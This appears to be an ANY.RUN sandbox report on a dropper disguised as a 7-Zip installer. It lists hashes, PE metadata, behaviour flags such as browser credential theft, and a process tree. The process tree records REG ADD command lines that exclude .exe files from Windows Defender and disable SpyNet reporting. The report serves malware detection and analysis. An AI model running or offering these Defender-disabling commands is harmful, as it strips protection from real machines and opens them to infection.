Malware analysis file Malicious activity | ANY.RUN

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	file
Full analysis:	https://app.any.run/tasks/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6
Verdict:	Malicious activity
Analysis date:	January 27, 2023, 09:03:56
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows
MD5:	531981FA2658977F0ECDAD58E88F3037
SHA1:	A32FBF450455E965B54506DEA14438E0598A8E08
SHA256:	3ECD4763FFC944FDC67A9027E459CD4F448B1A8D1B36147977AFAF86BBF2A261
SSDEEP:	196608:91OyP3N/E1u7Yz/qped/kgyLPFZRsCu3hOCVci8L4Xt7uhwp1K:3OI3a1u0KeSgIHRsCuwCVciZXRNK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
Mozilla Maintenance Service (67.0.4)
Notepad++ (64-bit x64) (7.5.1)
Opera 12.15 (12.15.1748)
Skype™ 7.39 (7.39.102)
Update for Microsoft .NET Framework 4.7.1 (KB4054852) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Drops the executable file immediately after the start
  - file.exe (PID: 2032)
  - Install.exe (PID: 2028)
  - Install.exe (PID: 1988)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Uses Task Scheduler to run other applications
  - Install.exe (PID: 1988)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
  - rundll32.exe (PID: 2972)
- Application was dropped or rewritten from another process
  - Install.exe (PID: 1988)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Creates a writable file the system directory
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Modifies exclusions in Windows Defender
  - reg.exe (PID: 2652)
  - reg.exe (PID: 2216)
  - reg.exe (PID: 620)
  - reg.exe (PID: 2168)
  - reg.exe (PID: 1440)
  - reg.exe (PID: 2400)
  - reg.exe (PID: 2444)
  - reg.exe (PID: 2096)
  - reg.exe (PID: 2992)
- Steals credentials from Web Browsers
  - FHYQWsM.exe (PID: 1440)
- Uses Task Scheduler to autorun other applications
  - FHYQWsM.exe (PID: 1440)
- Loads dropped or rewritten executable
  - rundll32.exe (PID: 2972)
  - rundll32.exe (PID: 1892)
- Modifies files in the Chrome extension folder
  - FHYQWsM.exe (PID: 1440)
- Actions looks like stealing of personal data
  - FHYQWsM.exe (PID: 1440)
SUSPICIOUS
- Reads the BIOS version
  - Install.exe (PID: 1988)
- Starts itself from another location
  - file.exe (PID: 2032)
- Executable content was dropped or overwritten
  - Install.exe (PID: 2028)
  - file.exe (PID: 2032)
  - Install.exe (PID: 1988)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Starts CMD.EXE for commands execution
  - forfiles.exe (PID: 1768)
  - forfiles.exe (PID: 1672)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Uses REG/REGEDIT.EXE to modify register
  - cmd.exe (PID: 124)
  - cmd.exe (PID: 1960)
  - cmd.exe (PID: 2544)
  - cmd.exe (PID: 3068)
  - cmd.exe (PID: 1708)
  - cmd.exe (PID: 1804)
  - cmd.exe (PID: 2660)
  - cmd.exe (PID: 2088)
  - wscript.exe (PID: 2480)
  - cmd.exe (PID: 1820)
  - cmd.exe (PID: 2232)
  - cmd.exe (PID: 2748)
  - cmd.exe (PID: 2692)
  - cmd.exe (PID: 2748)
  - cmd.exe (PID: 1672)
- Executes via Task Scheduler
  - powershell.EXE (PID: 2192)
  - CiuBamk.exe (PID: 2788)
  - powershell.EXE (PID: 2276)
  - powershell.EXE (PID: 2548)
  - powershell.EXE (PID: 2648)
  - FHYQWsM.exe (PID: 1440)
  - rundll32.EXE (PID: 2480)
  - rundll32.EXE (PID: 1636)
- Reads security settings of Internet Explorer
  - powershell.EXE (PID: 2192)
  - powershell.EXE (PID: 2276)
  - powershell.EXE (PID: 2548)
  - powershell.EXE (PID: 2648)
- Executes as Windows Service
  - RAServer.exe (PID: 2072)
  - RAServer.exe (PID: 2676)
  - RAServer.exe (PID: 2364)
  - RAServer.exe (PID: 2240)
- Executes scripts
  - CiuBamk.exe (PID: 2788)
- Reads settings of System Certificates
  - FHYQWsM.exe (PID: 1440)
- Creates a software uninstall entry
  - FHYQWsM.exe (PID: 1440)
- Checks Windows Trust Settings
  - FHYQWsM.exe (PID: 1440)
INFO
- The process checks LSA protection
  - Install.exe (PID: 1988)
  - powershell.EXE (PID: 2192)
  - powershell.EXE (PID: 2276)
  - powershell.EXE (PID: 2548)
  - wscript.exe (PID: 2480)
  - powershell.EXE (PID: 2648)
  - FHYQWsM.exe (PID: 1440)
  - rundll32.exe (PID: 2972)
- Reads the computer name
  - Install.exe (PID: 1988)
  - FHYQWsM.exe (PID: 1440)
- Reads the machine GUID from the registry
  - Install.exe (PID: 1988)
  - FHYQWsM.exe (PID: 1440)
- Checks supported languages
  - Install.exe (PID: 1988)
  - Install.exe (PID: 2028)
  - file.exe (PID: 2032)
  - CiuBamk.exe (PID: 2788)
  - FHYQWsM.exe (PID: 1440)
- Create files in a temporary directory
  - Install.exe (PID: 2028)
  - file.exe (PID: 2032)
  - powershell.EXE (PID: 2192)
  - Install.exe (PID: 1988)
  - powershell.EXE (PID: 2276)
  - powershell.EXE (PID: 2548)
  - powershell.EXE (PID: 2648)
- Creates files in the program directory
  - FHYQWsM.exe (PID: 1440)
- Process checks computer location settings
  - FHYQWsM.exe (PID: 1440)
- Dropped object may contain Bitcoin addresses
  - FHYQWsM.exe (PID: 1440)
- Creates files or folders in the user directory
  - FHYQWsM.exe (PID: 1440)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

Summary

Architecture:	IMAGE_FILE_MACHINE_I386
Subsystem:	IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:	2010-Nov-18 16:27:35
Detected languages:	English - United States
CompanyName:	Igor Pavlov
FileDescription:	7z Setup SFX
FileVersion:	9.20
InternalName:	7zS.sfx
LegalCopyright:	Copyright (c) 1999-2010 Igor Pavlov
OriginalFilename:	7zS.sfx.exe
ProductName:	7-Zip
ProductVersion:	9.20

DOS Header

e_magic:	MZ
e_cblp:	144
e_cp:	3
e_crlc:	-
e_cparhdr:	4
e_minalloc:	-
e_maxalloc:	65535
e_ss:	-
e_sp:	184
e_csum:	-
e_ip:	-
e_cs:	-
e_ovno:	-
e_oemid:	-
e_oeminfo:	-
e_lfanew:	232

PE Headers

Signature:	PE
Machine:	IMAGE_FILE_MACHINE_I386
NumberofSections:	5
TimeDateStamp:	2010-Nov-18 16:27:35
PointerToSymbolTable:	-
NumberOfSymbols:	-
SizeOfOptionalHeader:	224
Characteristics:	IMAGE_FILE_32BIT_MACHINE IMAGE_FILE_EXECUTABLE_IMAGE IMAGE_FILE_LINE_NUMS_STRIPPED IMAGE_FILE_LOCAL_SYMS_STRIPPED IMAGE_FILE_RELOCS_STRIPPED

Sections

Name	Virtual Address	Virtual Size	Raw Size	Charateristics	Entropy
.text	4096	104938	104960	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.60849
.rdata	110592	17556	17920	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	4.36802
.data	131072	23112	12800	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	1.37054
.sxdata	155648	4	512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.0203931
.rsrc	159744	2656	3072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	3.30196

Resources

Title	Entropy	Size	Codepage	Language	Type
1	3.75404	744	UNKNOWN	English - United States	RT_ICON
2	3.18403	296	UNKNOWN	English - United States	RT_ICON
5	1.43775	52	UNKNOWN	English - United States	RT_STRING
500	3.09294	184	UNKNOWN	English - United States	RT_DIALOG
1 (#2)	2.78284	148	UNKNOWN	English - United States	RT_STRING
1 (#3)	2.37086	34	UNKNOWN	English - United States	RT_GROUP_ICON
1 (#4)	3.44049	700	UNKNOWN	English - United States	RT_VERSION

Imports


KERNEL32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

237

Monitored processes

116

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1344

"C:\Users\admin\AppData\Local\Temp\file.exe"

C:\Users\admin\AppData\Local\Temp\file.exe

—

Explorer.EXE

User:

admin

Company:

Igor Pavlov

Integrity Level:

MEDIUM

Description:

7z Setup SFX

Exit code:

3221226540

Version:

9.20

Modules

Images
c:\users\admin\appdata\local\temp\file.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

2032

"C:\Users\admin\AppData\Local\Temp\file.exe"

C:\Users\admin\AppData\Local\Temp\file.exe

Explorer.EXE

User:

admin

Company:

Igor Pavlov

Integrity Level:

HIGH

Description:

7z Setup SFX

Exit code:

Version:

9.20

Modules

Images
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\users\admin\appdata\local\temp\file.exe
c:\windows\system32\wow64.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2028

.\Install.exe

C:\Users\admin\AppData\Local\Temp\7zS4C1D.tmp\Install.exe

file.exe

User:

admin

Company:

Igor Pavlov

Integrity Level:

HIGH

Description:

7z Setup SFX

Exit code:

Version:

9.20

Modules

Images
c:\users\admin\appdata\local\temp\7zs4c1d.tmp\install.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1988

.\Install.exe /S /site_id "525403"

C:\Users\admin\AppData\Local\Temp\7zS4E7E.tmp\Install.exe

Install.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\7zs4e7e.tmp\install.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1768

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

—

Install.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

ForFiles - Executes a command on selected files

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\forfiles.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1672

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

—

Install.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

ForFiles - Executes a command on selected files

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\forfiles.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

124

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

—

forfiles.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1960

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

—

forfiles.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernelbase.dll

2368

